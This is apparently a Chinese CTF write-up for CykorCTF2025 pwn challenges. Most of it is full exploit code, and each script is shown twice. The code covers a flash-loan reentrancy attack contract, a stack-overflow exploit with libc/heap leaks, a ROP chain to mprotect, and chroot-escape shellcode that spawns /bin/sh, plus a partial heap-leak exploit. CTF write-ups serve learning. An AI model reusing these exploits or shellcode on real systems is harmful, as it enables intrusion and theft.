# CykorCTF2025 Pwn 部分题解

## gram

内置的闪电贷合约有逻辑漏洞…
// Lends `amount` to `callback`, invokes the callback's `on_flash_loan` hook and
// then requires that the loan has been marked as repaid.
// NOTE(review): the outstanding loan lives in the single slot
// `storage.current_loan`. A nested flash_loan issued from inside the callback
// overwrites the outer amount; once that inner loan is repaid the slot is 0, so
// the final check below also passes for the outer loan.
pub fn flash_loan(amount: u64, callback: address) {
...
// Record the loan, then hand the funds to the borrower.
storage.current_loan = amount;
transfer(callback, amount);
...
// `repay_amount` is produced by the elided code above (not shown in this excerpt).
sync_call(callback, "on_flash_loan", amount, repay_amount);
// The only repayment check: the shared slot must have been cleared by repay().
let remaining: u64 = storage.current_loan;
require(remaining == 0, "flash loan not repaid");
}
// Accepts repayment of the currently recorded loan: the attached value must
// cover the loan plus a percentage fee, after which the loan slot is cleared.
pub fn repay() {
let received: u64 = msg.value;
// The amount owed is whatever is stored in the slot right now, i.e. the most
// recently written loan.
let loan: u64 = storage.current_loan;
// `fee_pct` is defined outside this excerpt.
let fee: u64 = loan * fee_pct / 100;
let required: u64 = loan + fee;
require(received >= required, "insufficient repayment");
// Clears the single loan slot; nothing here records which flash_loan call the
// repayment belongs to.
storage.current_loan = 0;
}
pub fn flash_loan(amount: u64, callback: address) {
...
storage.current_loan = amount;
transfer(callback, amount);
...
sync_call(callback, "on_flash_loan", amount, repay_amount);
let remaining: u64 = storage.current_loan;
require(remaining == 0, "flash loan not repaid");
}
pub fn repay() {
let received: u64 = msg.value;
let loan: u64 = storage.current_loan;
let fee: u64 = loan * fee_pct / 100;
let required: u64 = loan + fee;
require(received >= required, "insufficient repayment");
storage.current_loan = 0;
}
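漏洞在于 `current_loan` 是全局唯一的存储槽:在外层闪电贷的回调里再发起一次金额为 1 的内层闪电贷,会把 `current_loan` 覆盖为 1;内层贷款通过 `repay` 偿还后 `current_loan` 被清零,于是外层的 `require(remaining == 0)` 检查也能通过,外层借出的钱不用归还就可以直接转走。

算是签到题了,像我这种区块链萌新都会做。exp 如下: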
from pwn import *
import re, hashlib, itertools
HOST = "43.203.37.155"
PORT = 58172
def leading_zero_bits(h: bytes) -> int:
    """Return the number of leading zero bits in ``h``.

    The bytes are interpreted as one big-endian unsigned integer; the leading
    zero count is the total width minus the integer's bit length. An empty
    input has zero bits in total and therefore yields 0, and an all-zero input
    yields ``len(h) * 8``.
    """
    return len(h) * 8 - int.from_bytes(h, "big").bit_length()
def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
    """Brute-force the smallest nonce that satisfies the proof of work.

    The hashed message is ``prev || miner || nonce`` where the nonce is encoded
    as 8 little-endian bytes; a nonce is accepted when the SHA-256 digest has
    at least ``diff`` leading zero bits.

    Args:
        prev_hex: previous block hash as a hex string (no ``0x`` prefix).
        miner_hex: miner address as a hex string; a leading ``0x`` is stripped
            when present.
        diff: required number of leading zero bits.

    Returns:
        The first nonce, counting up from 0, whose digest meets the difficulty.

    Raises:
        ValueError: if ``diff`` exceeds 256, which no SHA-256 digest can meet
            (the search would otherwise never terminate), or if either hex
            string is malformed.
    """
    prev = bytes.fromhex(prev_hex)
    if miner_hex[:2] in ("0x", "0X"):
        miner_hex = miner_hex[2:]
    miner = bytes.fromhex(miner_hex)

    if diff > 256:
        raise ValueError(f"difficulty {diff} exceeds the 256 bits of a SHA-256 digest")
    if diff <= 0:
        # Every digest has at least zero leading zero bits, so nonce 0 wins.
        return 0

    # The prefix never changes, so build it once instead of on every attempt.
    prefix = prev + miner
    for n in itertools.count():
        digest = hashlib.sha256(prefix + n.to_bytes(8, "little")).digest()
        if leading_zero_bits(digest) >= diff:
            return n
def recv_prompt(r):
    """Read from tube ``r`` up to and including the next ``> `` prompt."""
    prompt = b"> "
    return r.recvuntil(prompt)
def parse_banner(txt: str):
    """Extract the account, pool and flag contract addresses from the banner.

    Each address is expected on a ``<Label>: 0x<hex>`` line. Hex digits are
    accepted in either case so a mixed-case address is not silently truncated.

    Returns:
        ``(acc, pool, flag)`` as ``0x``-prefixed strings.

    Raises:
        ValueError: if one of the three fields is absent from ``txt``.
    """
    found = []
    for label in ("Account", "Pool", "Flag"):
        m = re.search(label + r":\s+(0x[0-9a-fA-F]+)", txt)
        if m is None:
            raise ValueError(f"banner is missing the {label!r} address")
        found.append(m.group(1))
    acc, pool, flag = found
    return acc, pool, flag
def parse_work(txt: str):
    """Extract the proof-of-work parameters from the ``getwork`` output.

    Returns:
        ``(prev, miner, diff)``: the previous hash (hex, no prefix), the miner
        address (``0x``-prefixed hex) and the difficulty as an ``int``.

    Raises:
        ValueError: if any of the three fields is absent from ``txt``.
    """
    def field(label, pattern):
        m = re.search(pattern, txt)
        if m is None:
            raise ValueError(f"getwork output is missing the {label}")
        return m.group(1)

    prev = field("previous hash", r"Previous hash:\s+([0-9a-fA-F]+)")
    miner = field("miner address", r"Miner:\s+(0x[0-9a-fA-F]+)")
    diff = int(field("difficulty", r"Difficulty:\s+(\d+) leading zero bits"))
    return prev, miner, diff
def main():
    """Run the full exploit against the remote service.

    Steps: read the banner, mine until the account holds at least 3 tokens,
    deploy the attack contract, trigger the nested flash loan, then print the
    balance and call ``claim_flag``.

    Raises:
        RuntimeError: if the service does not report a deployed contract address.
    """
    r = remote(HOST, PORT)
    # try/finally so the connection is closed even when a step fails.
    try:
        banner = recv_prompt(r).decode()
        acc, pool, flag = parse_banner(banner)
        log.info(f"acc={acc}, pool={pool}, flag={flag}")

        # Mine until the reported balance reaches 3 tokens.
        # NOTE(review): presumably enough to repay the 1-token inner loan plus
        # its fee; confirm against the pool's fee settings.
        balance = 0
        while balance < 3:
            r.sendline(b"getwork")
            txt = r.recvuntil(b"Submit with: submit <nonce>\n")
            txt += recv_prompt(r)
            prev, miner, diff = parse_work(txt.decode())
            nonce = solve_pow(prev, miner, diff)
            log.info(f"found nonce {nonce} for diff {diff}")
            r.sendline(f"submit {nonce}".encode())
            out = recv_prompt(r).decode()
            m = re.search(r"Balance:\s+(\d+) tokens", out)
            if m:
                balance = int(m.group(1))
                log.info(f"balance now {balance}")

        # Attack contract. In the outer callback (amount > 1) it takes a nested
        # 1-token flash loan and forwards the outer loan to the owner; in the
        # inner callback it repays the inner loan, which zeroes the pool's
        # current_loan slot. The text is sent verbatim and ends with an "EOF" line.
        attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""
        r.sendline(b"code")
        r.recvuntil(b"Enter contract code")
        for line in attack_code.splitlines():
            r.sendline(line.encode())
        deploy_out = recv_prompt(r).decode()
        m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
        if m is None:
            # Fail with the service's own output instead of an opaque
            # "'NoneType' object has no attribute 'group'".
            raise RuntimeError("contract deployment failed:\n" + deploy_out)
        attack_addr = m.group(1)
        log.info(f"attack deployed at {attack_addr}")

        # Outer loan of 49999 tokens, with the attack contract as callback.
        r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
        recv_prompt(r)

        r.sendline(b"balance")
        bal_out = recv_prompt(r).decode()
        log.info("balance output:\n" + bal_out)

        r.sendline(f"call {flag} claim_flag".encode())
        final_out = recv_prompt(r).decode(errors="ignore")
        print(final_out)
        r.sendline(b"exit")
    finally:
        r.close()
if __name__ == "__main__":
main()
from pwn import *
import re, hashlib, itertools
HOST = "43.203.37.155"
PORT = 58172
def leading_zero_bits(h: bytes) -> int:
for i, b in enumerate(h):
if b == 0:
continue
return i*8 + (8 - b.bit_length())
return len(h) * 8
def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
prev = bytes.fromhex(prev_hex)
miner = bytes.fromhex(miner_hex[2:])
for n in itertools.count():
h = hashlib.sha256(prev + miner + n.to_bytes(8, "little")).digest()
if leading_zero_bits(h) >= diff:
return n
def recv_prompt(r):
return r.recvuntil(b"> ")
def parse_banner(txt: str):
acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
return acc, pool, flag
def parse_work(txt: str):
prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
return prev, miner, diff
def main():
r = remote(HOST, PORT)
banner = recv_prompt(r).decode()
acc, pool, flag = parse_banner(banner)
log.info(f"acc={acc}, pool={pool}, flag={flag}")
balance = 0
while balance < 3:
r.sendline(b"getwork")
txt = r.recvuntil(b"Submit with: submit <nonce>\n")
txt += recv_prompt(r)
prev, miner, diff = parse_work(txt.decode())
nonce = solve_pow(prev, miner, diff)
log.info(f"found nonce {nonce} for diff {diff}")
r.sendline(f"submit {nonce}".encode())
out = recv_prompt(r).decode()
m = re.search(r"Balance:\s+(\d+) tokens", out)
if m:
balance = int(m.group(1))
log.info(f"balance now {balance}")
attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""
r.sendline(b"code")
r.recvuntil(b"Enter contract code")
for line in attack_code.splitlines():
r.sendline(line.encode())
deploy_out = recv_prompt(r).decode()
m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
attack_addr = m.group(1)
log.info(f"attack deployed at {attack_addr}")
r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
recv_prompt(r)
r.sendline(b"balance")
bal_out = recv_prompt(r).decode()
log.info("balance output:\n" + bal_out)
r.sendline(f"call {flag} claim_flag".encode())
final_out = recv_prompt(r).decode(errors="ignore")
print(final_out)
r.sendline(b"exit")
r.close()
if __name__ == "__main__":
main()
## dbfs

出题人给了源码,实现了一个简单的文件系统:

- `SET <name> <type> [value]`:创建键或目录
- `GET <name>`:获取键值或列出目录内容
- `DELETE <name>`:删除键或目录
- `INFO <name>`:显示键或目录的详细信息
- `CHDIR <name>`:切换当前目录

在 handler_info 函数里,下面这段代码存在栈溢出漏洞:
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
strcat 没有做长度检查。但是问题是 strcat 默认会用 \x00 结尾,导致无法利用下面的 printf 泄漏地址,所以尝试找别的洞。

审计了一会发现 hex2bytes 函数里,如果输入非法的 hex 这里解析会失败,导致堆块里残留的地址不会被覆盖掉,所以风水一下搞个 libc 地址就可以了。
然后在打 rop 的时候会发现 payload 里不能出现 \x00,不然会截断导致报错。写个栈迁移到堆上即可。
后续打 orw,但是题目执行前 chroot 了,得先逃逸。

程序 chroot 到 /tmp 了,所以 open 失败,ls 只能看到 . 和 ..
完整 exp 如下:
# code by littflower.
from pwn import *
from sys import argv
# Target setup: binary under attack, pwntools context, and the tube to talk to.
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
# Pass "r" as the first argument to attack the remote service; with any other
# argument, or none at all, the local binary is started. The length check keeps
# a bare `python exp.py` from raising IndexError.
io = remote("43.203.37.155", 22222) if len(argv) > 1 and argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")
# `G` on the command line attaches gdb to the running target.
if args.G:
    gdb.attach(io)
def cmd(c):
    """Wait for the ``dbfs> `` prompt, then send ``c`` followed by a newline."""
    prompt = b"dbfs> "
    io.sendlineafter(prompt, c)
# Directory name template and nesting depth used later to build a very long cwd.
dir_name = b"A" * 255
deep_levels = 18

# --- Stage 1: leak libc and heap addresses -------------------------------
victimA = b"x" * 0xd0
# NOTE(review): victimA is bytes, so the f-string embeds its repr (b'xxx...')
# and the key name actually sent includes the b'' wrapper. Left unchanged
# because the heap offsets below were presumably tuned against this layout.
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
# 'Z' is not a hex digit. Per the write-up, a failed hex parse leaves stale
# heap contents in the value buffer, which GET then prints back.
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
# The dump is read as 16-hex-digit (8-byte) fields. recvn() waits for exactly
# 16 characters, whereas recv(16) may return early with fewer.
libc.address = u64(bytes.fromhex(io.recvn(16).decode())) - 0x203f70
io.recvn(16)  # skip the second field
heap_base = u64(bytes.fromhex(io.recvn(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")

# --- ROP gadgets (offsets are specific to the bundled libc.so.6) ----------
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1  # plain `ret`; not used by the chain below

# mprotect(page containing heap_base, 0x3000, 7) makes the heap RWX, then
# `call rax` jumps to the stub stored at heap_base + 0x1498.
# NOTE(review): rcx is loaded with heap_base before the `pop rdx` gadget,
# presumably because that gadget touches memory through rcx; confirm against
# the gadget's disassembly.
rop = flat([
    pop_rdi_ret, (heap_base) & 0xfffffffffffff000,
    pop_rsi_ret, 0x3000,
    pop_rcx_ret, heap_base,
    pop_rdx_ret, 7,
    mprotect,
    pop_rax_ret, heap_base + 0x1498,
    call_rax,
])
# Second-stage shellcode. Going by the x86-64 Linux syscall numbers it uses,
# it performs the usual chroot break-out and then spawns a shell:
#   mkdir("esc", 0o755)       syscall 83   (0x637365 is "esc", 0x1ed is 0o755)
#   chroot("esc")             syscall 161  (jumps to exit_process on failure)
#   chdir("..") 50 times      syscall 80   (0x2e2e is "..")
#   chroot(".")               syscall 161  (the word store rewrites ".." to ".")
#   execve("/bin/sh", 0, 0)   syscall 59   (0x68732f6e69622f is "/bin/sh")
#   exit(0)                   syscall 60   (only reached via exit_process)
# NOTE(review): the literal is an f-string without placeholders; a `{` added
# to the assembly later would be treated as a format field.
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall
mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process
xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50
escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop
mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall
xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall
exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""
# Assembled for the architecture of context.binary. Despite the name `orw`,
# this payload spawns a shell rather than doing open/read/write.
orw = asm(escape_shellcode)
# --- Stage 2: build a very deep working directory -------------------------
# Each level is a 255-byte name ending in a two-digit counter. Presumably this
# makes getcwd() return a path long enough for the strcat() calls in
# handler_info to overflow full_path.
for level in range(deep_levels):
    tag = b"%02d" % level
    nested = dir_name[:-len(tag)] + tag
    cmd(b"SET " + nested + b" set")
    cmd(b"CHDIR " + nested)

# Key name that carries the overflow: padding followed by the low six bytes of
# heap_base + 0x1430. The two high bytes are dropped because the payload must
# not contain \x00.
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")

# Stub that reads the final shellcode from stdin onto the current stack pointer.
reread = asm(shellcraft.read(0, "rsp", 0x300))

# Value layout: 8 filler bytes, the 12-qword ROP chain (0x60 bytes), then the
# stub. The stub starts 0x68 bytes in, matching heap_base + 0x1498 when the
# value sits at heap_base + 0x1430 (presumably the pivot target).
stage_value = b"K" * 8 + rop + reread.ljust(0x100, b"A")
cmd(b"SET " + victimB + b" bytes " + stage_value)
pause()
# INFO on the long key triggers the overflow in handler_info.
cmd(b"INFO " + victimB)
pause()
# Feed the stub: NOP sled followed by the chroot-escape shellcode.
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
# code by littflower.
from pwn import *
from sys import argv
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("43.203.37.155", 22222) if argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")
if args.G:
gdb.attach(io)
def cmd(c):
io.sendlineafter(b"dbfs> ", c)
dir_name = b"A" * 255
deep_levels = 18
victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall
mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process
xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50
escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop
mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall
xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall
exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""
orw = asm(escape_shellcode)
for i in range(deep_levels):
suffix = ("%02d" % i).encode()
name = dir_name[:-len(suffix)] + suffix
cmd(b"SET " + name + b" set")
cmd(b"CHDIR " + name)
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")
reread = asm(shellcraft.read(0, "rsp", 0x300))
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
cmd(b"INFO " + victimB)
pause()
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
## shortcut

牢了最久的题。。

- add / delete / run 时会进行 overlap 检查
- add:最多 8 个,大小固定 0x20,不限机会,但 run 之后不可用,必须先 reload
- delete:释放所有堆块,最后一个槽位指针不置 0,两次机会
- run:可以显示堆块内容并释放 img chunk,两次机会
- reload:分配 img chunk,两次机会
- rename:分配 0x30,并可控 0x10,一次机会

然后我写了一个泄漏 libc 和 heap base 的 exp 如下:
#!/usr/bin/env python3
from pwn import *
from sys import argv
import binascii
import struct
# Target setup: patched binary, pwntools context, libc for symbol offsets.
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)

# "r" as the first argument selects the remote target; the host and port are
# left blank in the write-up and must be filled in before use.
use_remote = len(argv) > 1 and argv[1] == 'r'
io = remote("", ) if use_remote else process(proc)

# `G` on the command line attaches gdb with a breakpoint at image offset 0x244a.
if args.G:
    gdb_script = "\nbreakrva 0x244a\n"
    gdb.attach(io, gdb_script)
def build_png():
    """Build the 2016-byte image blob sent to the target.

    The blob is a PNG signature, an IHDR chunk describing a 1x1 8-bit RGB
    image and an IEND chunk, padded on the right with ``b"A"`` to 2016 bytes.
    Each chunk is ``length || type || data || crc32(type || data)`` with
    big-endian 32-bit integers. No IDAT chunk is emitted.
    """
    def chunk(kind, payload=b""):
        body = kind + payload
        return struct.pack(">I", len(payload)) + body + struct.pack(">I", binascii.crc32(body))

    # width=1, height=1, bit depth 8, colour type 2 (RGB), no interlace
    header = struct.pack(">II", 1, 1) + b"\x08\x02\x00\x00\x00"
    image = b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", header) + chunk(b"IEND")
    return image.ljust(2016, b"A")
def choose(idx):
    """Answer the ``> `` menu prompt with option number ``idx``."""
    selection = str(idx).encode()
    io.sendlineafter(b"> ", selection)
def add(idx, buf):
    """Menu option 1: fill filter slot ``idx`` with the raw bytes ``buf``.

    The target asks for exactly 16 bytes, so ``buf`` is sent without a newline.
    """
    choose(1)
    slot = str(idx).encode()
    io.sendlineafter(b'slot index (0~7)? ', slot)
    data_prompt = f'send exactly 16 bytes for filter[{idx}]\n'.encode()
    io.sendafter(data_prompt, buf)
def delete():
    """Menu option 2 (delete); takes no further input."""
    choose(2)
def run(size, buf):
    """Menu option 3 (run) with a watermark of length ``size``.

    ``buf`` is sent only when ``size`` is non-zero; for ``size == 0`` the
    target is not prompted for watermark data.
    """
    choose(3)
    io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
    if not size:
        return
    io.sendafter(b'send 32 bytes for watermark\n', buf)
def reload():
    """Menu option 4 (reload): upload a fresh image blob from build_png()."""
    choose(4)
    image = build_png()
    io.send(image)
def rename():
    """Menu option 5 (rename); only selects the option, sends no data."""
    choose(5)
def name(buf):
    """Answer the initial name prompt and return the address the target prints.

    After the name is sent, the text between the next ``": "`` and the end of
    that line is parsed as a hexadecimal integer.
    """
    io.recvuntil(b"What is your name?\n")
    io.sendline(buf)
    io.recvuntil(b": ")
    hex_text = io.recvuntil(b"\n", drop=True).decode()
    return int(hex_text, 16)
def leak():
    """Return the 8-byte little-endian value that follows the ``fiLT\\x80`` marker.

    Uses ``recvn`` so that exactly 8 bytes are consumed; ``recv(8)`` may return
    early with fewer bytes, which would make ``u64`` fail.
    """
    io.recvuntil(b"fiLT\x80")
    return u64(io.recvn(8))
# --- PIE base: the target prints an address after the name prompt ---------
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")

# Initial image upload.
io.send(build_png())

# --- Heap leak: fill all 8 slots, free them, then dump via run ------------
for slot in range(8):
    add(slot, b"A" * 16)
delete()
run(0, b"")
# The leaked qword is shifted left by 12 to get the heap base; presumably it
# is a safe-linking-protected pointer (address >> 12). TODO confirm.
heap_base = leak() << 12

# --- libc leak: reload the image, run again, read a libc pointer ----------
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")
reload()

# Unfinished next stage, kept from the original as a sketch:
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()
#!/usr/bin/env python3
from pwn import *
from sys import argv
import binascii
import struct
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)
if args.G:
gdb.attach(io, """
breakrva 0x244a
""")
def build_png():
sig = b"\x89PNG\r\n\x1a\n"
ihdr_data = p32(1, endian="big") + p32(1, endian="big") + b"\x08\x02\x00\x00\x00" # 1x1 RGB
ihdr_body = b"IHDR" + ihdr_data
ihdr = p32(len(ihdr_data), endian="big") + ihdr_body + p32(binascii.crc32(ihdr_body), endian="big")
iend_body = b"IEND"
iend = p32(0, endian="big") + iend_body + p32(binascii.crc32(iend_body), endian="big")
png = sig + ihdr + iend
return png.ljust(2016, b"A")
def choose(idx):
io.sendlineafter(b"> ", str(idx).encode())
def add(idx, buf):
choose(1)
io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)
def delete():
choose(2)
def run(size, buf):
choose(3)
io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
if size:
io.sendafter(b'send 32 bytes for watermark\n', buf)
def reload():
choose(4)
# io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
io.send(build_png())
def rename():
choose(5)
def name(buf):
io.recvuntil(b"What is your name?\n")
io.sendline(buf)
io.recvuntil(b": ")
leak = int(io.recvuntil(b"\n", drop=True).decode(), 16)
return leak
def leak():
io.recvuntil(b"fiLT\x80")
return u64(io.recv(8))
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
io.send(build_png())
for i in range(8):
add(i, b"A"*16)
delete()
run(0, b"")
heap_base = leak() << 12
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")
reload()
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()
到这里还剩一次 delete 和一次 reload 的机会。
这里可以构造一个同时位于 tcache 和 smallbin 中的 chunk,然后打 tsu+(tcache stashing unlink+)即可。
## AKVC

= =